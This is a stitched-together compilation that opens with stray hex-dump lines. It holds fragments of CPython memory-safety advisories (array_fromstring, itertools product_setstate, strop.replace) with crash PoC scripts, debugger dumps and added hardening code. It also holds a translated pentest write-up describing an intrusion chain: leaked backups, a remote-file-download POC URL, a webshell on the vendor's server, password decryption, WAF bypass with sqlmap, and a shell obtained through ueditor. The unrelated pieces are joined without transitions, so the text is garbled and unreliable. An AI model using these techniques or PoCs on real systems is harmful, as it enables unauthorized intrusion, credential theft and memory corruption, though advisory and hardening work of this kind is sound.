000003b5 a[0000021c]: b854d00d3620
00000431 a[000001d8]: d8ab4609040620
0000044b a[000002db]: 10ec620d8ab460
00000461 a[000000de]: 9040620104e5f0
000004fb a[0000232f]: 10f74d0c0ce620
00000510 a[0000014a]: 9040620104e5f0
In some applications, such as those that are web-based, similar circumstances may manifest that would allow for remote exploitation.
To fix the issue, array_fromstring should check if self->ob_item is pointing to the same memory as str, and handle the copy accordingly.
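The aliasing check the advisory asks for, worked through on a small stand-in for the array object. This is an added example, not CPython's own code or its fix: the bytearr type, its functions and the itemsize of one byte are assumptions. The point it demonstrates is the ordering: whether src lies inside the array's own buffer has to be decided while that buffer is still valid, and after realloc the source pointer is rebased onto the new allocation rather than reused.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Hypothetical stand-in for CPython's arrayobject with itemsize == 1
 * (added example, not CPython's code). */
typedef struct {
    char *item;        /* element storage, the analogue of self->ob_item */
    size_t size;       /* elements in use */
    size_t allocated;  /* elements the buffer can hold */
} bytearr;

int bytearr_init(bytearr *a, const char *data, size_t n)
{
    a->item = malloc(n ? n : 1);
    if (a->item == NULL)
        return -1;
    memcpy(a->item, data, n);
    a->size = n;
    a->allocated = n;
    return 0;
}

void bytearr_free(bytearr *a)
{
    free(a->item);
    a->item = NULL;
    a->size = a->allocated = 0;
}

/* Append n bytes from src to a. The vulnerable sequence reallocates and
 * then copies from the caller's pointer; here the aliasing test runs
 * before realloc and the source pointer is rebased afterwards, so a
 * dangling src is never dereferenced. Returns 0 on success, -1 on error. */
int bytearr_fromstring(bytearr *a, const char *src, size_t n)
{
    int aliased = 0;
    size_t src_off = 0;
    char *newitem;

    if (n == 0)
        return 0;
    if (n > SIZE_MAX - a->size)        /* same role as the PY_SSIZE_T_MAX check */
        return -1;

    /* The aliasing check must happen while a->item is still valid. */
    if (src >= a->item && src < a->item + a->size) {
        aliased = 1;
        src_off = (size_t)(src - a->item);
        if (n > a->size - src_off)     /* the aliased range must lie within the array */
            return -1;
    }

    newitem = realloc(a->item, a->size + n);
    if (newitem == NULL)               /* on failure the old buffer is still owned by a */
        return -1;
    a->item = newitem;
    a->allocated = a->size + n;

    if (aliased)
        src = newitem + src_off;       /* the old pointer may now be freed memory */

    memcpy(newitem + a->size, src, n); /* dest is the new tail, so no overlap with src */
    a->size += n;
    return 0;
}

/* Self-concatenation, the case from the advisory: 1 if the array doubles
 * correctly, 0 otherwise. */
int demo_self_append(void)
{
    bytearr a;
    int ok;

    if (bytearr_init(&a, "ABCD", 4) != 0)
        return 0;
    ok = bytearr_fromstring(&a, a.item, a.size) == 0 &&
         a.size == 8 && memcmp(a.item, "ABCDABCD", 8) == 0;
    bytearr_free(&a);
    return ok;
}

/* A source that is a sub-range of the array, then a non-aliased source:
 * 1 if both appends produce the expected contents. */
int demo_partial_alias_append(void)
{
    bytearr b;
    int ok;

    if (bytearr_init(&b, "xyz", 3) != 0)
        return 0;
    ok = bytearr_fromstring(&b, b.item + 1, 2) == 0 &&
         b.size == 5 && memcmp(b.item, "xyzyz", 5) == 0 &&
         bytearr_fromstring(&b, "!", 1) == 0 &&
         b.size == 6 && memcmp(b.item, "xyzyz!", 6) == 0;
    bytearr_free(&b);
    return ok;
}

int main(void)
{
    printf("self-append %s\n", demo_self_append() ? "ok" : "FAILED");
    printf("partial-alias append %s\n", demo_partial_alias_append() ? "ok" : "FAILED");
    return 0;
}
```

Detecting the overlap by pointer comparison is what this toy can do; a real Python buffer may alias the array through any object exporting the buffer protocol, so the check has to be done on the raw pointers in exactly this position, before the reallocation.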
0x00 Using a keyword to obtain the target's source code
One morning I was given a temporary assignment to carry out a penetration test for a company. Only the main domain name was provided for this engagement, with no subdomains. After opening the target website, I first gathered information.
Middleware: IIS 8.5
Entering /admin, I found that a trailing / was automatically appended
That means the directory exists, so I blindly guessed a wave of files: login.aspx, default.aspx, main.aspx and so on
Finally the backend login page was found at login.aspx. Isn't this the time for a wave of weak passwords?
The account was locked after a trial attempt
A familiar start; since that is how it is, all I can do is try other approaches.
Some information was found in the HTML code of the homepage
Design and production? Judging by the domain name that followed, it is a website-building company
Next comes the key point: IIS 8.5 + ASP.NET + site-building system
Scan for backup files first
For this developer there were more than 400 IPs, which is no problem. Use the FOFA query tool and export them in batch
Next, scan for backup files. Here I recommend Brother B's scanner: https://github.com/breken5/webalivescan
It can perform batch liveness scans and directory scans
I found web.zip backup files under several sites.
After downloading them I compared them with the target site's files. They were basically consistent
0x01 Obtaining the code, auditing it, and hitting the wall again and again
Next, start the audit.
Place the focus on a sensitive operation in the interface, WebClient.DownLoadFile (remote file download)
Because this method must be given an absolute path. That is a headache, but after following the relevant parameters I discovered that
this method is called by another method.
The value is passed through server.mappath, so there is no need to find an absolute path; the system has arranged that for you.
Next, construct the POC:
ashx/api.ashx?m=downloadfilefilepath=asmx.jpgweburl=http://***。CN/
Access the address
The file exists, so the proof is feasible
Back to the target address
The file has not been fixed
Returning to the code and auditing further, there are several vulnerabilities in other interfaces, for example the ueditor remote fetch vulnerability
File renaming can also be abused
However, these interfaces require login
This is a headache, so I planned to look for SQL injection in interfaces that do not require login.
Finally, SQL string concatenation was found in one place.
But here the ISSAFESQLSTRING check is called
Common symbols are basically blocked
0x02 Taking down the developer and finding the reversible encryption and decryption algorithm for ordinary accounts
Since they all use the same website-building program, I suspected that the program has a built-in account.
So I prepared to work through the holes I had just audited, starting from sites running the same program
Finally, I successfully obtained a webshell on one of the sites
Look at the related information
This is actually the vendor's demo site group, where the source code of all the developer's sites is stored.
There should have been many demo environments during development, and it is estimated that all customers have one.
Through the server, I found my way to the demo website of the target site
The root directory contains a ZIP website backup and a SQL database backup.
If the target site was moved over directly, the backend account password must be the same.
Download the SQL file and search for related information
I found the SQL statement that inserts the account; its password is encrypted with
Since CMD5 could not crack it, I regarded the ciphertext as 33-bit encryption.
However, during login the password is sent after RSA encryption, while the backend actually uses 33-bit MD5 encryption.
Since I had the source code, I traced the login method.
After the password is passed in, Commfun.ENPWD is called for encryption.
Trace the ENPWD method
It can be seen that the password passed in is of RSA type; RSA decryption is performed first, then DES encryption.
Trace the Desencrypt.Encrypt method.
The encapsulated encryption method, which is passed the encryption key, is as follows:
Its core encryption method is as follows:
And the decryption method is also defined in this class
The encryption method, the decryption method and the key have been obtained. After that, they need to be pulled out and called separately.
Decrypt the encrypted string and get the result
Try logging in with it
I worked hard for a long time, but it was in vain.
0x03 A turn for the better: obtaining the target shell
It was already 4 p.m. with still no progress, so I prepared to try bypassing the SQL filtering.
At this point, a SQL injection point was found.
The method receives two parameters but filters only one of them.
Test on the target website
With the existing injection, I found that the WAF could be filled up with garbage parameters.
Hand it to sqlmap and run it with peace of mind to get the system account and password
Decrypt the obtained ciphertext and get the result
Try logging in. This time, yes!
It finally came!
I already knew from the earlier audit that many interfaces have vulnerabilities, and now I have successfully logged in.
Take it directly with ueditor.
The shell succeeded
0x04 Summary
1. Adding admin after the target URL shows the admin backend; the website's CMS information is found at the bottom of the website.
2. One of the websites was found to have a leaked source code archive.
5. Perform a local code audit of the website source code; ASHX/API.ASHX has a vulnerability that requires login. There is also a SQL injection vulnerability, which requires login and is filtered.
6.
7. Through the WebShell, it can be seen that the root directory of each website in the site group has a ZIP website backup and a SQL database backup; the SQL statements contain the inserted usernames and passwords (the passwords are 33 digits). All logins in the site group basically use the same username and password.
8. Source code analysis revealed that the login is encrypted via RSA+DES, and the encryption method and key values were found in the source code.
10. Write a decryption method based on the encryption method in the source code and decrypt the hash value, but it is not possible to log in.
11. Through source code audit, another SQL injection was found; here the WAF intercepts, and the injection is carried out via garbage-filled data; run the username through SQLMap. Through the decryption method above, the password hash value is decrypted and the plaintext password is finally obtained.
12. Log in to the system with the obtained username and password, and obtain the target system's webshell via the ueditor editor's remote file download.
Original link: https://xz.aliyun.com/t/8375
Title: Python 3.3 - 3.5 product_setstate() Out-of-bounds Read
Credit: John Leitch (john@autosectools.com), Bryce Darling (darlingbryce@gmail.com)
Url1: http://autosectools.com/Page/Python-product_setstate-Out-of-bounds-Read
Url2: http://bugs.python.org/issue25021
Resolution: Fixed
Python 3.3 - 3.5 suffer from a vulnerability caused by the behavior of the product_setstate() function. When called, the function loops over the state tuple provided and clamps each given index to a value within a range from 0 up to the max number of pools. Then, it loops over the pools and gets an item from the pool using the previously clamped index value.
However, for the upper bound, the clamping logic is using the number of pools and not the size of the individual pool, which can result in a call to PyTuple_GET_ITEM that uses an index outside of the bounds of the pool:
    for (i=0; i<n; i++)
    {
        PyObject* indexObject = PyTuple_GET_ITEM(state, i);
        Py_ssize_t index = PyLong_AsSsize_t(indexObject);
        if (index < 0 && PyErr_Occurred())
            return NULL; /* not an integer */
        /* clamp the index */
        if (index < 0)
            index = 0;
        else if (index > n-1)
            index = n-1; <<<< n is the number of pools, not the size of pool i.
        lz->indices[i] = index;
    }

    result = PyTuple_New(n);
    if (!result)
        return NULL;
    for (i=0; i<n; i++) {
        PyObject *pool = PyTuple_GET_ITEM(lz->pools, i);
        PyObject *element = PyTuple_GET_ITEM(pool, lz->indices[i]); <<<< The clamped index can still exceed the length of this pool.
        Py_INCREF(element);
        PyTuple_SET_ITEM(result, i, element);
    }
The invalid result of the PyTuple_GET_ITEM() expression is then passed to Py_INCREF(), which performs a write operation that corrupts memory.
In some applications, it may be possible to exploit this behavior to corrupt sensitive information, crash, or achieve code execution. The out-of-bounds write can be observed by running the following script:
import itertools
p = itertools.product((0,),(0,))
p.__setstate__((0, 1))
Which, depending on the arrangement of memory, may produce an exception such as this:
0:000> g
(ea4.11a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c962 ebx=059e8f80 ecx=00000000 edx=00000000 esi=004af564 edi=05392f78
eip=613211eb esp=004af4d0 ebp=004af4f8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
python35_d!product_setstate+0x13b:
613211eb 8b5108 mov edx,dword ptr [ecx+8] ds:002b:00000008=????????
0:000> k1
ChildEBP RetAddr
004af4f8 61553a22 python35_d!product_setstate+0x13b [c:\source\python-3.5.0b3\modules\itertoolsmodule.c @ 2266]
In some cases, EIP corruption may occur:
0:000> r
eax=00000000 ebx=03e0f790 ecx=6d2ad658 edx=00000002 esi=03e0f790 edi=6d0dbb20
eip=00000000 esp=004cf6a0 ebp=004cf6ac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
00000000 ?? ???
0:000> k4
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
004cf69c 6d08a390 0x0
004cf6ac 6d02b688 python35!PyIter_Next+0x10
004cf6c0 6d0dbb6e python35!chain_next+0x58
004cf6d0 6d0a021d python35!wrap_next+0x4e
To fix this issue, it is recommended that product_setstate() be updated to clamp indices within a range from 0 up to the size of the pool in the body of the result tuple building loop.
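The two clamping rules side by side, on plain C arrays standing in for the pool tuples. This is an added example, not CPython's code or its fix: pools are modelled only by their sizes, and the function names are assumptions. With the advisory's pools of one element each and state (0, 1), the old rule clamps the second index to npools-1 = 1, which is past the end of a one-element pool; the corrected rule clamps against the size of the pool the index is used on and reports an empty pool instead of selecting from it.

```c
#include <stddef.h>
#include <stdio.h>

/* The clamping the advisory describes: every index is limited to
 * [0, npools-1]. The result can exceed pool_size-1 for a short pool. */
long clamp_by_pool_count(long index, size_t npools)
{
    if (index < 0)
        return 0;
    if (index > (long)npools - 1)
        return (long)npools - 1;
    return index;
}

/* Corrected clamping: the bound is the size of the pool the index will
 * be used on. Returns -1 for an empty pool, where no element exists. */
long clamp_by_pool_size(long index, size_t pool_size)
{
    if (pool_size == 0)
        return -1;
    if (index < 0)
        return 0;
    if (index > (long)pool_size - 1)
        return (long)pool_size - 1;
    return index;
}

/* Restore the product state (hypothetical analogue of product_setstate):
 * writes one index per pool into indices and returns 1 if every index is
 * a valid position in its pool, 0 if some pool is empty. */
int product_setstate_fixed(const size_t *pool_sizes, size_t npools,
                           const long *state, long *indices)
{
    for (size_t i = 0; i < npools; i++) {
        long idx = clamp_by_pool_size(state[i], pool_sizes[i]);
        if (idx < 0)
            return 0;
        indices[i] = idx;
    }
    return 1;
}

/* How many indices the old clamping leaves out of bounds for the given
 * pools, i.e. how many PyTuple_GET_ITEM calls would read past a pool. */
size_t count_oob_with_old_clamp(const size_t *pool_sizes, size_t npools,
                                const long *state)
{
    size_t oob = 0;
    for (size_t i = 0; i < npools; i++) {
        long idx = clamp_by_pool_count(state[i], npools);
        if (idx < 0 || (size_t)idx >= pool_sizes[i])
            oob++;
    }
    return oob;
}

/* The advisory's case, itertools.product((0,),(0,)).__setstate__((0, 1)):
 * two pools of one element, state index 1 on the second pool. Returns 1
 * if the old rule produces exactly one out-of-bounds index and the fixed
 * rule yields indices (0, 0). */
int demo_advisory_case(void)
{
    size_t pools[2] = {1, 1};
    long state[2] = {0, 1};
    long fixed[2] = {-1, -1};

    if (count_oob_with_old_clamp(pools, 2, state) != 1)
        return 0;
    if (!product_setstate_fixed(pools, 2, state, fixed))
        return 0;
    return fixed[0] == 0 && fixed[1] == 0;
}

int main(void)
{
    printf("advisory case %s\n", demo_advisory_case() ? "handled" : "FAILED");
    return 0;
}
```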
Title: Python 2.7 strop.replace() Integer Overflow
Credit: John Leitch (john@autosectools.com)
Url1: http://autosectools.com/Page/Python-strop-replace-Integer-Overflow
Url2: http://bugs.python.org/issue24708
Resolution: Fixed
The Python 2.7 strop.replace() method suffers from an integer overflow that can be exploited to write outside the bounds of the string buffer and potentially achieve code execution. The issue can be triggered by performing a large substitution that overflows the arithmetic used in mymemreplace() to calculate the size of the new string:
static char *
mymemreplace(const char *str, Py_ssize_t len,           /* input string */
             const char *pat, Py_ssize_t pat_len,       /* pattern string to find */
             const char *sub, Py_ssize_t sub_len,       /* substitution string */
             Py_ssize_t count,                          /* number of replacements */
             Py_ssize_t *out_len)
{
    [...]
    new_len = len + nfound*(sub_len - pat_len); <<<< Unchecked arithmetic can overflow here.
    if (new_len == 0) {
        /* Have to allocate something for the caller to free(). */
        out_s = (char *)PyMem_MALLOC(1);
        if (out_s == NULL)
            return NULL;
        out_s[0] = '\0';
    }
    else {
        assert(new_len > 0);
        new_s = (char *)PyMem_MALLOC(new_len); <<<< An allocation is performed using overflowed value.
        if (new_s == NULL)
            return NULL;
        out_s = new_s;

        for (; count > 0 && len > 0; --count) { <<<< Memory is copied to new_s using len, which can be greater than the overflowed new_len value.
            /* find index of next instance of pattern */
            offset = mymemfind(str, len, pat, pat_len);
            if (offset == -1)
                break;

            /* copy non matching part of input string */
            memcpy(new_s, str, offset);
            str += offset + pat_len;
            len -= offset + pat_len;

            /* copy substitute into the output string */
            new_s += offset;
            memcpy(new_s, sub, sub_len);
            new_s += sub_len;
        }
        /* copy any remaining values into output string */
        if (len > 0)
            memcpy(new_s, str, len);
    }
    [...]
}
The following script demonstrates the issue:
import strop
strop.replace("\x75"*0xEAAA,"\x75","AA"*0xAAAA)
When run under a debugger, it produces the following exception:
0:000> r
eax=01e4cfd0 ebx=5708fc94 ecx=00003c7a edx=00000000 esi=01e3dde8 edi=57096000
eip=7026ae7a esp=0027fc98 ebp=0027fca0 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
MSVCR90!memcpy+0x5a:
7026ae7a f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> db edi-0x10
57095ff0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
57096000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
57096010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
57096020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
57096030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
57096040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
57096050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
57096060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:000> db esi
01e3dde8 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01e3ddf8 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01e3de08 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01e3de18 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01e3de28 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01e3de38 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01e3de48 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01e3de58 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:000> k
ChildEBP RetAddr
0027fca0 1e056efc MSVCR90!memcpy+0x5a [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 188]
0027fcd0 1e05700b python27!mymemreplace+0xfc [c:\build27\cpython\modules\stropmodule.c @ 1139]
0027fd18 1e0aaed7 python27!strop_replace+0xbb [c:\build27\cpython\modules\stropmodule.c @ 1185]
0027fd30 1e0edcc0 python27!PyCFunction_Call+0x47 [c:\build27\cpython\objects\methodobject.c @ 81]
0027fd5c 1e0f012a python27!call_function+0x2b0 [c:\build27\cpython\python\ceval.c @ 4035]
0027fdcc 1e0f1100 python27!PyEval_EvalFrameEx+0x239a [c:\build27\cpython\python\ceval.c @ 2684]
0027fe00 1e0f1162 python27!PyEval_EvalCodeEx+0x690 [c:\build27\cpython\python\ceval.c @ 3267]
0027fe2c 1e1170ca python27!PyEval_EvalCode+0x22 [c:\build27\cpython\python\ceval.c @ 674]
0027fe44 1e118215 python27!run_mod+0x2a [c:\build27\cpython\python\pythonrun.c @ 1371]
0027fe64 1e1187b0 python27!PyRun_FileExFlags+0x75 [c:\build27\cpython\python\pythonrun.c @ 1358]
0027fea4 1e119129 python27!PyRun_SimpleFileExFlags+0x190 [c:\build27\cpython\python\pythonrun.c @ 950]
0027fec0 1e038cb5 python27!PyRun_AnyFileExFlags+0x59 [c:\build27\cpython\python\pythonrun.c @ 753]
0027ff3c 1d00116d python27!Py_Main+0x965 [c:\build27\cpython\modules\main.c @ 643]
0027ff80 74b97c04 python!__tmainCRTStartup+0x10f [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 586]
0027ff94 7701ad1f KERNEL32!BaseThreadInitThunk+0x24
0027ffdc 7701acea ntdll!__RtlUserThreadStart+0x2f
0027ffec 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> !analyze -v -nodb
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
FAULTING_IP:
MSVCR90!memcpy+5a [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 188]
7026ae7a f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 7026ae7a (MSVCR90!memcpy+0x0000005a)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 57096000
Attempt to write to address 57096000
CONTEXT: 00000000 -- (.cxr 0x0;r)
eax=01e4cfd0 ebx=5708fc94 ecx=00003c7a edx=00000000 esi=01e3dde8 edi=57096000
eip=7026ae7a esp=0027fc98 ebp=0027fca0 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
MSVCR90!memcpy+0x5a:
7026ae7a f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
FAULTING_THREAD: 00001408
PROCESS_NAME: python.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 57096000
WRITE_ADDRESS: 57096000
FOLLOWUP_IP:
MSVCR90!memcpy+5a [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 188]
7026ae7a f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
NTGLOBALFLAG: 470
APPLICATION_VERIFIER_FLAGS: 0
APP: python.exe
ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) x86fre
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_FILL_PATTERN_NXCODE
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_NXCODE
DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_NXCODE
LAST_CONTROL_TRANSFER: from 1e056efc to 7026ae7a
STACK_TEXT:
0027fca0 1e056efc 5708fc94 01e37a7c 00015554 MSVCR90!memcpy+0x5a
0027fcd0 1e05700b 01e2ba4e 38e171c8 01d244cc python27!mymemreplace+0xfc
0027fd18 1e0aaed7 00000000 01cebe40 01de2c38 python27!strop_replace+0xbb
0027fd30 1e0edcc0 01de2c38 01cebe40 00000000 python27!PyCFunction_Call+0x47
0027fd5c 1e0f012a 0027fdb4 01ce6c80 01ce6c80 python27!call_function+0x2b0
0027fdcc 1e0f1100 01ddd9d0 00000000 01ce6c80 python27!PyEval_EvalFrameEx+0x239a
0027fe00 1e0f1162 01ce6c80 01ddd9d0 01ceaa50 python27!PyEval_EvalCodeEx+0x690
0027fe2c 1e1170ca 01ce6c80 01ceaa50 01ceaa50 python27!PyEval_EvalCode+0x22
0027fe44 1e118215 01dca090 01ceaa50 01ceaa50 python27!run_mod+0x2a
0027fe64 1e1187b0 702c7408 00342ebb 00000101 python27!PyRun_FileExFlags+0x75
0027fea4 1e119129 702c7408 00342ebb 00000001 python27!PyRun_SimpleFileExFlags+0x190
0027fec0 1e038cb5 702c7408 00342ebb 00000001 python27!PyRun_AnyFileExFlags+0x59
0027ff3c 1d00116d 00000002 00342e98 00341950 python27!Py_Main+0x965
0027ff80 74b97c04 7ffde000 74b97be0 b4e726fd python!__tmainCRTStartup+0x10f
0027ff94 7701ad1f 7ffde000 b723218a 00000000 KERNEL32!BaseThreadInitThunk+0x24
0027ffdc 7701acea ffffffff 77000212 00000000 ntdll!__RtlUserThreadStart+0x2f
0027ffec 00000000 1d001314 7ffde000 00000000 ntdll!_RtlUserThreadStart+0x1b
STACK_COMMAND: .cxr 0x0 ; kb
FAULTING_SOURCE_LINE: f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm
FAULTING_SOURCE_FILE: f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm
FAULTING_SOURCE_LINE_NUMBER: 188
FAULTING_SOURCE_CODE:
No source found for 'f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm'
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: msvcr90!memcpy+5a
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: MSVCR90
IMAGE_NAME: MSVCR90.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 51ea24a5
FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_NXCODE_c0000005_MSVCR90.dll!memcpy
BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_FILL_PATTERN_NXCODE_msvcr90!memcpy+5a
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:string_dereference_fill_pattern_nxcode_c0000005_msvcr90.dll!memcpy
FAILURE_ID_HASH: {031149d8-0626-9042-d8b7-a1766b1c5514}
Followup: MachineOwner
---------
To fix the issue, mymemreplace() should validate that the computed value new_len has not overflowed. The advisory's suggestion is to compare (new_len - len) / nfound with sub_len - pat_len; if the two are not equal, an overflow has occurred. Because signed overflow is undefined behaviour in C, a more robust form of the same check is performed before the multiplication, rejecting the call when nfound exceeds (PY_SSIZE_T_MAX - len) divided by (sub_len - pat_len) whenever sub_len is greater than pat_len, so that the overflowed value is never computed at all.
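The following C program is an added illustration, not code from the advisory or from CPython. It reproduces the length arithmetic with a 32-bit signed size type so that the PoC's numbers wrap the same way on any host, and places a division-based pre-check beside it that rejects the PoC's parameters before any allocation takes place. The names unchecked_new_len, checked_new_len, safe_replace, replace_equals and poc_is_rejected, and the simplified replacement routine, are assumptions made for the example; CPython's mymemreplace() uses Py_ssize_t, so on a 64-bit build these particular values do not wrap, although larger ones would.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not CPython code. A 32-bit signed size stands in for
 * Py_ssize_t on the x86 build the advisory was tested on. */
typedef int32_t ssize32_t;
#define SSIZE32_MAX INT32_MAX

/* The advisory's arithmetic, new_len = len + nfound*(sub_len - pat_len),
 * done in uint32_t so the wrap is well defined. For the PoC parameters this
 * returns 0x38e171c8 (about 954 MiB): positive, so assert(new_len > 0)
 * passes, yet the copy loop then writes roughly 5 GiB into that buffer. */
static ssize32_t unchecked_new_len(ssize32_t len, ssize32_t nfound,
                                   ssize32_t sub_len, ssize32_t pat_len)
{
    uint32_t delta = (uint32_t)sub_len - (uint32_t)pat_len;
    return (ssize32_t)((uint32_t)len + (uint32_t)nfound * delta);
}

/* Hardened form: decide whether the result fits BEFORE computing it, using
 * division so that no intermediate can overflow. Returns -1 when the result
 * would not fit (where CPython would raise OverflowError), else the length. */
static ssize32_t checked_new_len(ssize32_t len, ssize32_t nfound,
                                 ssize32_t sub_len, ssize32_t pat_len)
{
    if (len < 0 || nfound < 0 || sub_len < 0 || pat_len < 0)
        return -1;
    if (sub_len >= pat_len) {                    /* result grows */
        ssize32_t delta = sub_len - pat_len;     /* >= 0, cannot overflow */
        if (delta > 0 && nfound > (SSIZE32_MAX - len) / delta)
            return -1;
        return len + nfound * delta;
    }
    /* result shrinks: nfound*(pat_len - sub_len) must not exceed len */
    if (nfound > len / (pat_len - sub_len))
        return -1;
    return len - nfound * (pat_len - sub_len);
}

/* Left-to-right, non-overlapping replacement structured like mymemreplace()
 * (count, size, copy) but sized with checked_new_len(). Returns a
 * NUL-terminated heap buffer, or NULL with *out_len == -1 on a size failure. */
static char *safe_replace(const char *str, ssize32_t len,
                          const char *pat, ssize32_t pat_len,
                          const char *sub, ssize32_t sub_len,
                          ssize32_t *out_len)
{
    ssize32_t nfound = 0, new_len, i;
    char *out, *w;

    *out_len = -1;
    if (pat_len <= 0 || len < 0 || sub_len < 0)
        return NULL;
    for (i = 0; i + pat_len <= len; ) {          /* count matches */
        if (memcmp(str + i, pat, (size_t)pat_len) == 0) { nfound++; i += pat_len; }
        else i++;
    }
    if ((new_len = checked_new_len(len, nfound, sub_len, pat_len)) < 0)
        return NULL;                             /* reject, never under-allocate */
    if ((out = malloc((size_t)new_len + 1)) == NULL)
        return NULL;
    for (w = out, i = 0; i + pat_len <= len; ) { /* copy with substitution */
        if (memcmp(str + i, pat, (size_t)pat_len) == 0) {
            memcpy(w, sub, (size_t)sub_len); w += sub_len; i += pat_len;
        } else {
            *w++ = str[i++];
        }
    }
    memcpy(w, str + i, (size_t)(len - i));       /* tail shorter than pat_len */
    w += len - i;
    *w = '\0';
    *out_len = (ssize32_t)(w - out);             /* equals new_len by construction */
    return out;
}

/* Helper for NUL-terminated inputs: true if the result equals expect. */
static bool replace_equals(const char *str, const char *pat,
                           const char *sub, const char *expect)
{
    ssize32_t n;
    char *r = safe_replace(str, (ssize32_t)strlen(str), pat, (ssize32_t)strlen(pat),
                           sub, (ssize32_t)strlen(sub), &n);
    bool ok = r != NULL && n == (ssize32_t)strlen(expect) && strcmp(r, expect) == 0;
    free(r);
    return ok;
}

/* Constructs the advisory's PoC input ("\x75"*0xEAAA, pattern "\x75",
 * substitute "AA"*0xAAAA) and reports whether the hardened routine refuses it. */
static bool poc_is_rejected(void)
{
    const ssize32_t len = 0xEAAA, sub_len = 2 * 0xAAAA;   /* 60074 and 87380 */
    ssize32_t n = 0;
    char *str = malloc((size_t)len), *sub = malloc((size_t)sub_len), *r;
    bool rejected;

    if (str == NULL || sub == NULL) { free(str); free(sub); return false; }
    memset(str, 0x75, (size_t)len);
    memset(sub, 'A', (size_t)sub_len);
    r = safe_replace(str, len, "\x75", 1, sub, sub_len, &n);
    rejected = r == NULL && n == -1;
    free(r); free(str); free(sub);
    return rejected;
}
```

For the PoC's parameters the unchecked arithmetic yields 0x38e171c8, which is the same number that appears in the mymemreplace frame of the STACK_TEXT output above, consistent with the truncated new_len still being live in that frame at the time of the crash; checked_new_len() returns -1 for the same inputs because nfound (60074) exceeds (SSIZE32_MAX - len) / (sub_len - pat_len), which is 24575.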
source: https://www.securityfocus.com/bid/60847/info
Mobile USB Drive HD is prone to multiple local file-include and arbitrary file-upload vulnerabilities because it fails to adequately validate uploaded files and user-supplied file paths.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
